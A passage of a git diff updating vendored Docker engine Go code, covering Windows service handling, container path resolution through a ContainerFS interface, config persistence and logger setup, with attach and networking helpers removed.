if exts != "" { - ss[1], err = syscall.UTF16PtrFromString(exts) + ss[1], err = windows.UTF16PtrFromString(exts) if err != nil { return err } @@ -230,12 +230,7 @@ func registerService() error { return err } - err = eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error) - if err != nil { - return err - } - - return nil + return eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error) } func unregisterService() error { @@ -259,25 +254,28 @@ func unregisterService() error { return nil } -func initService(daemonCli *DaemonCli) (bool, error) { +// initService is the entry point for running the daemon as a Windows +// service. It returns an indication to stop (if registering/un-registering); +// an indication of whether it is running as a service; and an error. +func initService(daemonCli *DaemonCli) (bool, bool, error) { if *flUnregisterService { if *flRegisterService { - return true, errors.New("--register-service and --unregister-service cannot be used together") + return true, false, errors.New("--register-service and --unregister-service cannot be used together") } - return true, unregisterService() + return true, false, unregisterService() } if *flRegisterService { - return true, registerService() + return true, false, registerService() } if !*flRunService { - return false, nil + return false, false, nil } interactive, err := svc.IsAnInteractiveSession() if err != nil { - return false, err + return false, false, err } h := &handler{ @@ -290,7 +288,7 @@ func initService(daemonCli *DaemonCli) (bool, error) { if !interactive { log, err = eventlog.Open(*flServiceName) if err != nil { - return false, err + return false, false, err } } @@ -311,9 +309,9 @@ func initService(daemonCli *DaemonCli) (bool, error) { // Wait for the first signal from the service handler. 
err = <-h.fromsvc if err != nil { - return false, err + return false, false, err } - return false, nil + return false, true, nil } func (h *handler) started() error { @@ -398,8 +396,8 @@ func initPanicFile(path string) error { // Update STD_ERROR_HANDLE to point to the panic file so that Go writes to // it when it panics. Remember the old stderr to restore it before removing // the panic file. - sh := syscall.STD_ERROR_HANDLE - h, err := syscall.GetStdHandle(sh) + sh := windows.STD_ERROR_HANDLE + h, err := windows.GetStdHandle(uint32(sh)) if err != nil { return err } @@ -411,13 +409,19 @@ func initPanicFile(path string) error { return err } + // Reset os.Stderr to the panic file (so fmt.Fprintf(os.Stderr,...) actually gets redirected) + os.Stderr = os.NewFile(uintptr(panicFile.Fd()), "/dev/stderr") + + // Force threads that panic to write to stderr (the panicFile handle now), otherwise it will go into the ether + log.SetOutput(os.Stderr) + return nil } func removePanicFile() { if st, err := panicFile.Stat(); err == nil { if st.Size() == 0 { - sh := syscall.STD_ERROR_HANDLE + sh := windows.STD_ERROR_HANDLE setStdHandle.Call(uintptr(sh), uintptr(oldStderr)) panicFile.Close() os.Remove(panicFile.Name()) diff --git a/vendor/github.com/docker/docker/codecov.yml b/vendor/github.com/docker/docker/codecov.yml new file mode 100644 index 0000000000..594265c6cf --- /dev/null +++ b/vendor/github.com/docker/docker/codecov.yml @@ -0,0 +1,17 @@ +comment: + layout: header, changes, diff, sunburst +coverage: + status: + patch: + default: + target: 50% + only_pulls: true + # project will give us the diff in the total code coverage between a commit + # and its parent + project: + default: + target: auto + threshold: "15%" + changes: false +ignore: + - "vendor/*" diff --git a/vendor/github.com/docker/docker/container/archive.go b/vendor/github.com/docker/docker/container/archive.go index 56e6598b9c..ed72c4a405 100644 --- a/vendor/github.com/docker/docker/container/archive.go +++ 
b/vendor/github.com/docker/docker/container/archive.go @@ -1,12 +1,12 @@ -package container +package container // import "github.com/docker/docker/container" import ( "os" - "path/filepath" "github.com/docker/docker/api/types" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" ) // ResolvePath resolves the given path in the container to a resource on the @@ -14,18 +14,24 @@ import ( // the absolute path to the resource relative to the container's rootfs, and // an error if the path points to outside the container's rootfs. func (container *Container) ResolvePath(path string) (resolvedPath, absPath string, err error) { + if container.BaseFS == nil { + return "", "", errors.New("ResolvePath: BaseFS of container " + container.ID + " is unexpectedly nil") + } // Check if a drive letter supplied, it must be the system drive. No-op except on Windows - path, err = system.CheckSystemDriveAndRemoveDriveLetter(path) + path, err = system.CheckSystemDriveAndRemoveDriveLetter(path, container.BaseFS) if err != nil { return "", "", err } // Consider the given path as an absolute path in the container. - absPath = archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path) + absPath = archive.PreserveTrailingDotOrSeparator( + container.BaseFS.Join(string(container.BaseFS.Separator()), path), + path, + container.BaseFS.Separator()) // Split the absPath into its Directory and Base components. We will // resolve the dir in the scope of the container then append the base. - dirPath, basePath := filepath.Split(absPath) + dirPath, basePath := container.BaseFS.Split(absPath) resolvedDirPath, err := container.GetResourcePath(dirPath) if err != nil { @@ -34,8 +40,7 @@ func (container *Container) ResolvePath(path string) (resolvedPath, absPath stri // resolvedDirPath will have been cleaned (no trailing path separators) so // we can manually join it with the base path element. 
- resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath - + resolvedPath = resolvedDirPath + string(container.BaseFS.Separator()) + basePath return resolvedPath, absPath, nil } @@ -44,7 +49,12 @@ func (container *Container) ResolvePath(path string) (resolvedPath, absPath stri // resolved to a path on the host corresponding to the given absolute path // inside the container. func (container *Container) StatPath(resolvedPath, absPath string) (stat *types.ContainerPathStat, err error) { - lstat, err := os.Lstat(resolvedPath) + if container.BaseFS == nil { + return nil, errors.New("StatPath: BaseFS of container " + container.ID + " is unexpectedly nil") + } + driver := container.BaseFS + + lstat, err := driver.Lstat(resolvedPath) if err != nil { return nil, err } @@ -57,17 +67,17 @@ func (container *Container) StatPath(resolvedPath, absPath string) (stat *types. return nil, err } - linkTarget, err = filepath.Rel(container.BaseFS, hostPath) + linkTarget, err = driver.Rel(driver.Path(), hostPath) if err != nil { return nil, err } // Make it an absolute path. 
- linkTarget = filepath.Join(string(filepath.Separator), linkTarget) + linkTarget = driver.Join(string(driver.Separator()), linkTarget) } return &types.ContainerPathStat{ - Name: filepath.Base(absPath), + Name: driver.Base(absPath), Size: lstat.Size(), Mode: lstat.Mode(), Mtime: lstat.ModTime(), diff --git a/vendor/github.com/docker/docker/container/container.go b/vendor/github.com/docker/docker/container/container.go index fc4fe2717f..5f31d8df12 100644 --- a/vendor/github.com/docker/docker/container/container.go +++ b/vendor/github.com/docker/docker/container/container.go @@ -1,24 +1,22 @@ -package container +package container // import "github.com/docker/docker/container" import ( + "bytes" + "context" "encoding/json" "fmt" "io" - "net" "os" "path/filepath" - "strconv" + "runtime" "strings" "sync" "syscall" "time" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" + "github.com/containerd/containerd/cio" containertypes "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" - networktypes "github.com/docker/docker/api/types/network" swarmtypes "github.com/docker/docker/api/types/swarm" "github.com/docker/docker/container/stream" "github.com/docker/docker/daemon/exec" @@ -27,53 +25,43 @@ import ( "github.com/docker/docker/daemon/network" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/promise" "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/restartmanager" - "github.com/docker/docker/runconfig" - runconfigopts "github.com/docker/docker/runconfig/opts" "github.com/docker/docker/volume" - "github.com/docker/go-connections/nat" - "github.com/docker/libnetwork" - "github.com/docker/libnetwork/netlabel" - 
"github.com/docker/libnetwork/options" - "github.com/docker/libnetwork/types" + volumemounts "github.com/docker/docker/volume/mounts" + "github.com/docker/go-units" agentexec "github.com/docker/swarmkit/agent/exec" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const configFileName = "config.v2.json" -const ( - // DefaultStopTimeout is the timeout (in seconds) for the syscall signal used to stop a container. - DefaultStopTimeout = 10 -) +// ExitStatus provides exit reasons for a container. +type ExitStatus struct { + // The exit code with which the container exited. + ExitCode int -var ( - errInvalidEndpoint = fmt.Errorf("invalid endpoint while building port map info") - errInvalidNetwork = fmt.Errorf("invalid network settings while building port map info") -) + // Whether the container encountered an OOM. + OOMKilled bool -// DetachError is special error which returned in case of container detach. -type DetachError struct{} - -func (DetachError) Error() string { - return "detached from container" + // Time at which the container died + ExitedAt time.Time } -// CommonContainer holds the fields for a container which are -// applicable across all platforms supported by the daemon. -type CommonContainer struct { +// Container holds the structure defining a container object. +type Container struct { StreamConfig *stream.Config // embed for Container to support states directly. - *State `json:"State"` // Needed for Engine API version <= 1.11 - Root string `json:"-"` // Path to the "home" of the container, including metadata. - BaseFS string `json:"-"` // Path to the graphdriver mountpoint - RWLayer layer.RWLayer `json:"-"` + *State `json:"State"` // Needed for Engine API version <= 1.11 + Root string `json:"-"` // Path to the "home" of the container, including metadata. 
+ BaseFS containerfs.ContainerFS `json:"-"` // interface containing graphdriver mount + RWLayer layer.RWLayer `json:"-"` ID string Created time.Time Managed bool @@ -85,37 +73,50 @@ type CommonContainer struct { LogPath string Name string Driver string + OS string // MountLabel contains the options for the 'mount' command MountLabel string ProcessLabel string RestartCount int HasBeenStartedBefore bool HasBeenManuallyStopped bool // used for unless-stopped restart policy - MountPoints map[string]*volume.MountPoint + MountPoints map[string]*volumemounts.MountPoint HostConfig *containertypes.HostConfig `json:"-"` // do not serialize the host config in the json, otherwise we'll make the container unportable ExecCommands *exec.Store `json:"-"` - SecretStore agentexec.SecretGetter `json:"-"` + DependencyStore agentexec.DependencyGetter `json:"-"` SecretReferences []*swarmtypes.SecretReference + ConfigReferences []*swarmtypes.ConfigReference // logDriver for closing LogDriver logger.Logger `json:"-"` LogCopier *logger.Copier `json:"-"` restartManager restartmanager.RestartManager attachContext *attachContext + + // Fields here are specific to Unix platforms + AppArmorProfile string + HostnamePath string + HostsPath string + ShmPath string + ResolvConfPath string + SeccompProfile string + NoNewPrivileges bool + + // Fields here are specific to Windows + NetworkSharedContainerID string `json:"-"` + SharedEndpointList []string `json:"-"` } // NewBaseContainer creates a new container with its // basic configuration. 
func NewBaseContainer(id, root string) *Container { return &Container{ - CommonContainer: CommonContainer{ - ID: id, - State: NewState(), - ExecCommands: exec.NewStore(), - Root: root, - MountPoints: make(map[string]*volume.MountPoint), - StreamConfig: stream.NewConfig(), - attachContext: &attachContext{}, - }, + ID: id, + State: NewState(), + ExecCommands: exec.NewStore(), + Root: root, + MountPoints: make(map[string]*volumemounts.MountPoint), + StreamConfig: stream.NewConfig(), + attachContext: &attachContext{}, } } @@ -139,41 +140,58 @@ func (container *Container) FromDisk() error { return err } - if err := label.ReserveLabel(container.ProcessLabel); err != nil { - return err + // Ensure the operating system is set if blank. Assume it is the OS of the + // host OS if not, to ensure containers created before multiple-OS + // support are migrated + if container.OS == "" { + container.OS = runtime.GOOS } + return container.readHostConfig() } -// ToDisk saves the container configuration on disk. -func (container *Container) ToDisk() error { +// toDisk saves the container configuration on disk and returns a deep copy. 
+func (container *Container) toDisk() (*Container, error) { + var ( + buf bytes.Buffer + deepCopy Container + ) pth, err := container.ConfigPath() if err != nil { - return err + return nil, err } - jsonSource, err := ioutils.NewAtomicFileWriter(pth, 0644) + // Save container settings + f, err := ioutils.NewAtomicFileWriter(pth, 0600) if err != nil { - return err + return nil, err } - defer jsonSource.Close() + defer f.Close() - enc := json.NewEncoder(jsonSource) + w := io.MultiWriter(&buf, f) + if err := json.NewEncoder(w).Encode(container); err != nil { + return nil, err + } - // Save container settings - if err := enc.Encode(container); err != nil { - return err + if err := json.NewDecoder(&buf).Decode(&deepCopy); err != nil { + return nil, err + } + deepCopy.HostConfig, err = container.WriteHostConfig() + if err != nil { + return nil, err } - return container.WriteHostConfig() + return &deepCopy, nil } -// ToDiskLocking saves the container configuration on disk in a thread safe way. -func (container *Container) ToDiskLocking() error { - container.Lock() - err := container.ToDisk() - container.Unlock() - return err +// CheckpointTo makes the Container's current state visible to queries, and persists state. +// Callers must hold a Container lock. +func (container *Container) CheckpointTo(store ViewDB) error { + deepCopy, err := container.toDisk() + if err != nil { + return err + } + return store.Save(deepCopy) } // readHostConfig reads the host configuration from disk for the container. @@ -205,39 +223,58 @@ func (container *Container) readHostConfig() error { return nil } -// WriteHostConfig saves the host configuration on disk for the container. -func (container *Container) WriteHostConfig() error { +// WriteHostConfig saves the host configuration on disk for the container, +// and returns a deep copy of the saved object. Callers must hold a Container lock. 
+func (container *Container) WriteHostConfig() (*containertypes.HostConfig, error) { + var ( + buf bytes.Buffer + deepCopy containertypes.HostConfig + ) + pth, err := container.HostConfigPath() if err != nil { - return err + return nil, err } f, err := ioutils.NewAtomicFileWriter(pth, 0644) if err != nil { - return err + return nil, err } defer f.Close() - return json.NewEncoder(f).Encode(&container.HostConfig) + w := io.MultiWriter(&buf, f) + if err := json.NewEncoder(w).Encode(&container.HostConfig); err != nil { + return nil, err + } + + if err := json.NewDecoder(&buf).Decode(&deepCopy); err != nil { + return nil, err + } + return &deepCopy, nil } // SetupWorkingDirectory sets up the container's working directory as set in container.Config.WorkingDir -func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error { +func (container *Container) SetupWorkingDirectory(rootIDs idtools.IDPair) error { + // TODO @jhowardmsft, @gupta-ak LCOW Support. This will need revisiting. + // We will need to do remote filesystem operations here. + if container.OS != runtime.GOOS { + return nil + } + if container.Config.WorkingDir == "" { return nil } container.Config.WorkingDir = filepath.Clean(container.Config.WorkingDir) - pth, err := container.GetResourcePath(container.Config.WorkingDir) if err != nil { return err } - if err := idtools.MkdirAllNewAs(pth, 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(pth, 0755, rootIDs); err != nil { pthInfo, err2 := os.Stat(pth) if err2 == nil && pthInfo != nil && !pthInfo.IsDir() { - return fmt.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir) + return errors.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir) } return err @@ -260,17 +297,18 @@ func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error { // symlinking to a different path) between using this method and using the // path. 
See symlink.FollowSymlinkInScope for more details. func (container *Container) GetResourcePath(path string) (string, error) { + if container.BaseFS == nil { + return "", errors.New("GetResourcePath: BaseFS of container " + container.ID + " is unexpectedly nil") + } // IMPORTANT - These are paths on the OS where the daemon is running, hence // any filepath operations must be done in an OS agnostic way. - - cleanPath := cleanResourcePath(path) - r, e := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, cleanPath), container.BaseFS) + r, e := container.BaseFS.ResolveScopedPath(path, false) // Log this here on the daemon side as there's otherwise no indication apart // from the error being propagated all the way back to the client. This makes // debugging significantly easier and clearly indicates the error comes from the daemon. if e != nil { - logrus.Errorf("Failed to FollowSymlinkInScope BaseFS %s cleanPath %s path %s %s\n", container.BaseFS, cleanPath, path, e) + logrus.Errorf("Failed to ResolveScopedPath BaseFS %s path %s %s\n", container.BaseFS.Path(), path, e) } return r, e } @@ -316,12 +354,13 @@ func (container *Container) CheckpointDir() string { } // StartLogger starts a new logger driver for the container. 
-func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Logger, error) { - c, err := logger.GetLogDriver(cfg.Type) +func (container *Container) StartLogger() (logger.Logger, error) { + cfg := container.HostConfig.LogConfig + initDriver, err := logger.GetLogDriver(cfg.Type) if err != nil { - return nil, fmt.Errorf("Failed to get logging factory: %v", err) + return nil, errors.Wrap(err, "failed to get logging factory") } - ctx := logger.Context{ + info := logger.Info{ Config: cfg.Config, ContainerID: container.ID, ContainerName: container.Name, @@ -337,12 +376,30 @@ func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Lo // Set logging file for "json-logger" if cfg.Type == jsonfilelog.Name { - ctx.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID)) + info.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID)) if err != nil { return nil, err } + + container.LogPath = info.LogPath } - return c(ctx) + + l, err := initDriver(info) + if err != nil { + return nil, err + } + + if containertypes.LogMode(cfg.Config["mode"]) == containertypes.LogModeNonBlock { + bufferSize := int64(-1) + if s, exists := cfg.Config["max-buffer-size"]; exists { + bufferSize, err = units.RAMInBytes(s) + if err != nil { + return nil, err + } + } + l = logger.NewRingLogger(l, info, bufferSize) + } + return l, nil } // GetProcessLabel returns the process label for the container. @@ -366,185 +423,6 @@ func (container *Container) GetExecIDs() []string { return container.ExecCommands.List() } -// Attach connects to the container's TTY, delegating to standard -// streams or websockets depending on the configuration. 
-func (container *Container) Attach(stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error { - ctx := container.InitAttachContext() - return AttachStreams(ctx, container.StreamConfig, container.Config.OpenStdin, container.Config.StdinOnce, container.Config.Tty, stdin, stdout, stderr, keys) -} - -// AttachStreams connects streams to a TTY. -// Used by exec too. Should this move somewhere else? -func AttachStreams(ctx context.Context, streamConfig *stream.Config, openStdin, stdinOnce, tty bool, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error { - var ( - cStdout, cStderr io.ReadCloser - cStdin io.WriteCloser - wg sync.WaitGroup - errors = make(chan error, 3) - ) - - if stdin != nil && openStdin { - cStdin = streamConfig.StdinPipe() - wg.Add(1) - } - - if stdout != nil { - cStdout = streamConfig.StdoutPipe() - wg.Add(1) - } - - if stderr != nil { - cStderr = streamConfig.StderrPipe() - wg.Add(1) - } - - // Connect stdin of container to the http conn. 
- go func() { - if stdin == nil || !openStdin { - return - } - logrus.Debug("attach: stdin: begin") - - var err error - if tty { - _, err = copyEscapable(cStdin, stdin, keys) - } else { - _, err = io.Copy(cStdin, stdin) - } - if err == io.ErrClosedPipe { - err = nil - } - if err != nil { - logrus.Errorf("attach: stdin: %s", err) - errors <- err - } - if stdinOnce && !tty { - cStdin.Close() - } else { - // No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr - if cStdout != nil { - cStdout.Close() - } - if cStderr != nil { - cStderr.Close() - } - } - logrus.Debug("attach: stdin: end") - wg.Done() - }() - - attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) { - if stream == nil { - return - } - - logrus.Debugf("attach: %s: begin", name) - _, err := io.Copy(stream, streamPipe) - if err == io.ErrClosedPipe { - err = nil - } - if err != nil { - logrus.Errorf("attach: %s: %v", name, err) - errors <- err - } - // Make sure stdin gets closed - if stdin != nil { - stdin.Close() - } - streamPipe.Close() - logrus.Debugf("attach: %s: end", name) - wg.Done() - } - - go attachStream("stdout", stdout, cStdout) - go attachStream("stderr", stderr, cStderr) - - return promise.Go(func() error { - done := make(chan struct{}) - go func() { - wg.Wait() - close(done) - }() - select { - case <-done: - case <-ctx.Done(): - // close all pipes - if cStdin != nil { - cStdin.Close() - } - if cStdout != nil { - cStdout.Close() - } - if cStderr != nil { - cStderr.Close() - } - <-done - } - close(errors) - for err := range errors { - if err != nil { - return err - } - } - return nil - }) -} - -// Code c/c from io.Copy() modified to handle escape sequence -func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) { - if len(keys) == 0 { - // Default keys : ctrl-p ctrl-q - keys = []byte{16, 17} - } - buf := make([]byte, 32*1024) - for { - nr, er := src.Read(buf) - if nr > 0 { - // ---- Docker addition - 
preservBuf := []byte{} - for i, key := range keys { - preservBuf = append(preservBuf, buf[0:nr]...) - if nr != 1 || buf[0] != key { - break - } - if i == len(keys)-1 { - src.Close() - return 0, DetachError{} - } - nr, er = src.Read(buf) - } - var nw int - var ew error - if len(preservBuf) > 0 { - nw, ew = dst.Write(preservBuf) - nr = len(preservBuf) - } else { - // ---- End of docker - nw, ew = dst.Write(buf[0:nr]) - } - if nw > 0 { - written += int64(nw) - } - if ew != nil { - err = ew - break - } - if nr != nw { - err = io.ErrShortWrite - break - } - } - if er == io.EOF { - break - } - if er != nil { - err = er - break - } - } - return written, err -} - // ShouldRestart decides whether the daemon should restart the container or not. // This is based on the container's restart policy. func (container *Container) ShouldRestart() bool { @@ -554,14 +432,19 @@ func (container *Container) ShouldRestart() bool { // AddMountPointWithVolume adds a new mount point configured with a volume to the container. 
func (container *Container) AddMountPointWithVolume(destination string, vol volume.Volume, rw bool) { - container.MountPoints[destination] = &volume.MountPoint{ + operatingSystem := container.OS + if operatingSystem == "" { + operatingSystem = runtime.GOOS + } + volumeParser := volumemounts.NewParser(operatingSystem) + container.MountPoints[destination] = &volumemounts.MountPoint{ Type: mounttypes.TypeVolume, Name: vol.Name(), Driver: vol.DriverName(), Destination: destination, RW: rw, Volume: vol, - CopyData: volume.DefaultCopyMode, + CopyData: volumeParser.DefaultCopyMode(), } } @@ -569,21 +452,20 @@ func (container *Container) AddMountPointWithVolume(destination string, vol volu func (container *Container) UnmountVolumes(volumeEventLog func(name, action string, attributes map[string]string)) error { var errors []string for _, volumeMount := range container.MountPoints { - // Check if the mounpoint has an ID, this is currently the best way to tell if it's actually mounted - // TODO(cpuguyh83): there should be a better way to handle this - if volumeMount.Volume != nil && volumeMount.ID != "" { - if err := volumeMount.Volume.Unmount(volumeMount.ID); err != nil { - errors = append(errors, err.Error()) - continue - } - volumeMount.ID = "" + if volumeMount.Volume == nil { + continue + } - attributes := map[string]string{ - "driver": volumeMount.Volume.DriverName(), - "container": container.ID, - } - volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes) + if err := volumeMount.Cleanup(); err != nil { + errors = append(errors, err.Error()) + continue } + + attributes := map[string]string{ + "driver": volumeMount.Volume.DriverName(), + "container": container.ID, + } + volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes) } if len(errors) > 0 { return fmt.Errorf("error while unmounting volumes for container %s: %s", container.ID, strings.Join(errors, "; ")) @@ -641,337 +523,6 @@ func (container *Container) InitDNSHostConfig() { } } -// 
GetEndpointInNetwork returns the container's endpoint to the provided network. -func (container *Container) GetEndpointInNetwork(n libnetwork.Network) (libnetwork.Endpoint, error) { - endpointName := strings.TrimPrefix(container.Name, "/") - return n.EndpointByName(endpointName) -} - -func (container *Container) buildPortMapInfo(ep libnetwork.Endpoint) error { - if ep == nil { - return errInvalidEndpoint - } - - networkSettings := container.NetworkSettings - if networkSettings == nil { - return errInvalidNetwork - } - - if len(networkSettings.Ports) == 0 { - pm, err := getEndpointPortMapInfo(ep) - if err != nil { - return err - } - networkSettings.Ports = pm - } - return nil -} - -func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) { - pm := nat.PortMap{} - driverInfo, err := ep.DriverInfo() - if err != nil { - return pm, err - } - - if driverInfo == nil { - // It is not an error for epInfo to be nil - return pm, nil - } - - if expData, ok := driverInfo[netlabel.ExposedPorts]; ok { - if exposedPorts, ok := expData.([]types.TransportPort); ok { - for _, tp := range exposedPorts { - natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port))) - if err != nil { - return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err) - } - pm[natPort] = nil - } - } - } - - mapData, ok := driverInfo[netlabel.PortMap] - if !ok { - return pm, nil - } - - if portMapping, ok := mapData.([]types.PortBinding); ok { - for _, pp := range portMapping { - natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port))) - if err != nil { - return pm, err - } - natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))} - pm[natPort] = append(pm[natPort], natBndg) - } - } - - return pm, nil -} - -// GetSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox -func GetSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap { - pm := nat.PortMap{} - if sb == nil { - return pm 
- } - - for _, ep := range sb.Endpoints() { - pm, _ = getEndpointPortMapInfo(ep) - if len(pm) > 0 { - break - } - } - return pm -} - -// BuildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint. -func (container *Container) BuildEndpointInfo(n libnetwork.Network, ep libnetwork.Endpoint) error { - if ep == nil { - return errInvalidEndpoint - } - - networkSettings := container.NetworkSettings - if networkSettings == nil { - return errInvalidNetwork - } - - epInfo := ep.Info() - if epInfo == nil { - // It is not an error to get an empty endpoint info - return nil - } - - if _, ok := networkSettings.Networks[n.Name()]; !ok { - networkSettings.Networks[n.Name()] = &network.EndpointSettings{ - EndpointSettings: &networktypes.EndpointSettings{}, - } - } - networkSettings.Networks[n.Name()].NetworkID = n.ID() - networkSettings.Networks[n.Name()].EndpointID = ep.ID() - - iface := epInfo.Iface() - if iface == nil { - return nil - } - - if iface.MacAddress() != nil { - networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String() - } - - if iface.Address() != nil { - ones, _ := iface.Address().Mask.Size() - networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String() - networkSettings.Networks[n.Name()].IPPrefixLen = ones - } - - if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil { - onesv6, _ := iface.AddressIPv6().Mask.Size() - networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String() - networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6 - } - - return nil -} - -// UpdateJoinInfo updates network settings when container joins network n with endpoint ep. 
-func (container *Container) UpdateJoinInfo(n libnetwork.Network, ep libnetwork.Endpoint) error { - if err := container.buildPortMapInfo(ep); err != nil { - return err - } - - epInfo := ep.Info() - if epInfo == nil { - // It is not an error to get an empty endpoint info - return nil - } - if epInfo.Gateway() != nil { - container.NetworkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String() - } - if epInfo.GatewayIPv6().To16() != nil { - container.NetworkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String() - } - - return nil -} - -// UpdateSandboxNetworkSettings updates the sandbox ID and Key. -func (container *Container) UpdateSandboxNetworkSettings(sb libnetwork.Sandbox) error { - container.NetworkSettings.SandboxID = sb.ID() - container.NetworkSettings.SandboxKey = sb.Key() - return nil -} - -// BuildJoinOptions builds endpoint Join options from a given network. -func (container *Container) BuildJoinOptions(n libnetwork.Network) ([]libnetwork.EndpointOption, error) { - var joinOptions []libnetwork.EndpointOption - if epConfig, ok := container.NetworkSettings.Networks[n.Name()]; ok { - for _, str := range epConfig.Links { - name, alias, err := runconfigopts.ParseLink(str) - if err != nil { - return nil, err - } - joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias)) - } - } - return joinOptions, nil -} - -// BuildCreateEndpointOptions builds endpoint options from a given network. 
-func (container *Container) BuildCreateEndpointOptions(n libnetwork.Network, epConfig *networktypes.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) { - var ( - bindings = make(nat.PortMap) - pbList []types.PortBinding - exposeList []types.TransportPort - createOptions []libnetwork.EndpointOption - ) - - defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() - - if (!container.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) || - container.NetworkSettings.IsAnonymousEndpoint { - createOptions = append(createOptions, libnetwork.CreateOptionAnonymous()) - } - - if epConfig != nil { - ipam := epConfig.IPAMConfig - if ipam != nil && (ipam.IPv4Address != "" || ipam.IPv6Address != "" || len(ipam.LinkLocalIPs) > 0) { - var ipList []net.IP - for _, ips := range ipam.LinkLocalIPs { - if ip := net.ParseIP(ips); ip != nil { - ipList = append(ipList, ip) - } - } - createOptions = append(createOptions, - libnetwork.CreateOptionIpam(net.ParseIP(ipam.IPv4Address), net.ParseIP(ipam.IPv6Address), ipList, nil)) - } - - for _, alias := range epConfig.Aliases { - createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias)) - } - } - - if container.NetworkSettings.Service != nil { - svcCfg := container.NetworkSettings.Service - - var vip string - if svcCfg.VirtualAddresses[n.ID()] != nil { - vip = svcCfg.VirtualAddresses[n.ID()].IPv4 - } - - var portConfigs []*libnetwork.PortConfig - for _, portConfig := range svcCfg.ExposedPorts { - portConfigs = append(portConfigs, &libnetwork.PortConfig{ - Name: portConfig.Name, - Protocol: libnetwork.PortConfig_Protocol(portConfig.Protocol), - TargetPort: portConfig.TargetPort, - PublishedPort: portConfig.PublishedPort, - }) - } - - createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()])) - } - - if !containertypes.NetworkMode(n.Name()).IsUserDefined() { - 
createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution()) - } - - // configs that are applicable only for the endpoint in the network - // to which container was connected to on docker run. - // Ideally all these network-specific endpoint configurations must be moved under - // container.NetworkSettings.Networks[n.Name()] - if n.Name() == container.HostConfig.NetworkMode.NetworkName() || - (n.Name() == defaultNetName && container.HostConfig.NetworkMode.IsDefault()) { - if container.Config.MacAddress != "" { - mac, err := net.ParseMAC(container.Config.MacAddress) - if err != nil { - return nil, err - } - - genericOption := options.Generic{ - netlabel.MacAddress: mac, - } - - createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption)) - } - } - - // Port-mapping rules belong to the container & applicable only to non-internal networks - portmaps := GetSandboxPortMapInfo(sb) - if n.Info().Internal() || len(portmaps) > 0 { - return createOptions, nil - } - - if container.HostConfig.PortBindings != nil { - for p, b := range container.HostConfig.PortBindings { - bindings[p] = []nat.PortBinding{} - for _, bb := range b { - bindings[p] = append(bindings[p], nat.PortBinding{ - HostIP: bb.HostIP, - HostPort: bb.HostPort, - }) - } - } - } - - portSpecs := container.Config.ExposedPorts - ports := make([]nat.Port, len(portSpecs)) - var i int - for p := range portSpecs { - ports[i] = p - i++ - } - nat.SortPortMap(ports, bindings) - for _, port := range ports { - expose := types.TransportPort{} - expose.Proto = types.ParseProtocol(port.Proto()) - expose.Port = uint16(port.Int()) - exposeList = append(exposeList, expose) - - pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto} - binding := bindings[port] - for i := 0; i < len(binding); i++ { - pbCopy := pb.GetCopy() - newP, err := 